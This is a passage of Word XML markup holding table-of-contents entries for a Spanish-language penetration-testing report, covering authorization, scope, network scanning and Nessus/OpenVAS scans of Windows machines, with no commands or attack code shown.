            <w:r w:rsidR="00B66FE7" w:rsidRPr="00794CCD">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>b)</w:t>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
                <w:lang w:eastAsia="es-ES"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B66FE7" w:rsidRPr="00794CCD">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Descripción de la empresa</w:t>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc135575969 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>54</w:t>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="548C7EB4" w14:textId="47A35FD0" w:rsidR="00B66FE7" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TDC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="660"/>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="es-ES"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc135575970" w:history="1">
            <w:r w:rsidR="00B66FE7" w:rsidRPr="00794CCD">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>c)</w:t>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
                <w:lang w:eastAsia="es-ES"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B66FE7" w:rsidRPr="00794CCD">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Planteamiento del problema</w:t>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc135575970 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>55</w:t>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2CE59FC0" w14:textId="6094F445" w:rsidR="00B66FE7" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TDC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="660"/>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="es-ES"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc135575971" w:history="1">
            <w:r w:rsidR="00B66FE7" w:rsidRPr="00794CCD">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>d)</w:t>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
                <w:lang w:eastAsia="es-ES"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B66FE7" w:rsidRPr="00794CCD">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Objetivo General</w:t>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc135575971 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>55</w:t>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="002E52DC" w14:textId="1A81C3A6" w:rsidR="00B66FE7" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TDC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="660"/>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="es-ES"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc135575972" w:history="1">
            <w:r w:rsidR="00B66FE7" w:rsidRPr="00794CCD">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>e)</w:t>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
                <w:lang w:eastAsia="es-ES"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B66FE7" w:rsidRPr="00794CCD">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Formulario de autorización de pentesting</w:t>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc135575972 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>56</w:t>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0C2D67B0" w14:textId="4FBDFE0F" w:rsidR="00B66FE7" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TDC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="660"/>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="es-ES"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc135575973" w:history="1">
            <w:r w:rsidR="00B66FE7" w:rsidRPr="00794CCD">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>f)</w:t>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
                <w:lang w:eastAsia="es-ES"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B66FE7" w:rsidRPr="00794CCD">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Tipos de pruebas</w:t>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc135575973 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>57</w:t>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="44EF9365" w14:textId="5F72C497" w:rsidR="00B66FE7" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TDC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="660"/>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="es-ES"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc135575974" w:history="1">
            <w:r w:rsidR="00B66FE7" w:rsidRPr="00794CCD">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>g)</w:t>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
                <w:lang w:eastAsia="es-ES"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B66FE7" w:rsidRPr="00794CCD">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Restricciones y conformidades</w:t>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc135575974 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>58</w:t>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="35F66459" w14:textId="10A612A4" w:rsidR="00B66FE7" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TDC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="660"/>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="es-ES"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc135575975" w:history="1">
            <w:r w:rsidR="00B66FE7" w:rsidRPr="00794CCD">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>h)</w:t>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
                <w:lang w:eastAsia="es-ES"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B66FE7" w:rsidRPr="00794CCD">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Acuerdo de confidencialidad y secreto</w:t>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc135575975 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>59</w:t>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="48746CA5" w14:textId="3AE1DBD2" w:rsidR="00B66FE7" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TDC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="es-ES"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc135575976" w:history="1">
            <w:r w:rsidR="00B66FE7" w:rsidRPr="00794CCD">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.Recopilación de información</w:t>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc135575976 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>63</w:t>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3578C644" w14:textId="7E9FB87D" w:rsidR="00B66FE7" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TDC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="660"/>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="es-ES"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc135575977" w:history="1">
            <w:r w:rsidR="00B66FE7" w:rsidRPr="00794CCD">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>a)</w:t>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
                <w:lang w:eastAsia="es-ES"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B66FE7" w:rsidRPr="00794CCD">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Escaneo de la red:</w:t>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc135575977 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>63</w:t>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="755AEDC0" w14:textId="4A4E916E" w:rsidR="00B66FE7" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TDC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="660"/>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="es-ES"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc135575978" w:history="1">
            <w:r w:rsidR="00B66FE7" w:rsidRPr="00794CCD">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>b)</w:t>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
                <w:lang w:eastAsia="es-ES"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B66FE7" w:rsidRPr="00794CCD">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Escaneo de vulnerabilidades con Nessus y openvas:</w:t>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc135575978 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>83</w:t>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3C5FD0CB" w14:textId="6E048F8B" w:rsidR="00B66FE7" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TDC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="es-ES"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc135575979" w:history="1">
            <w:r w:rsidR="00B66FE7" w:rsidRPr="00794CCD">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Máquina Windows10 -&gt;</w:t>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc135575979 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>83</w:t>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="42D9C0E8" w14:textId="16393BB4" w:rsidR="00B66FE7" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TDC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="es-ES"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc135575980" w:history="1">
            <w:r w:rsidR="00B66FE7" w:rsidRPr="00794CCD">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Máquina Windows Server DC02 -&gt;</w:t>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc135575980 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>99</w:t>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="36CA50DC" w14:textId="064E35E8" w:rsidR="00B66FE7" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TDC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="es-ES"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc135575981" w:history="1">
            <w:r w:rsidR="00B66FE7" w:rsidRPr="00794CCD">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Máquina Windows Server  -&gt;</w:t>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc135575981 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>104</w:t>
            </w:r>
            <w:r w:rsidR="00B66FE7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0A8CD3D4" w14:textId="69015ABC" w:rsidR="00B66FE7" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TDC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="es-ES"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc135575982" w:history="1">
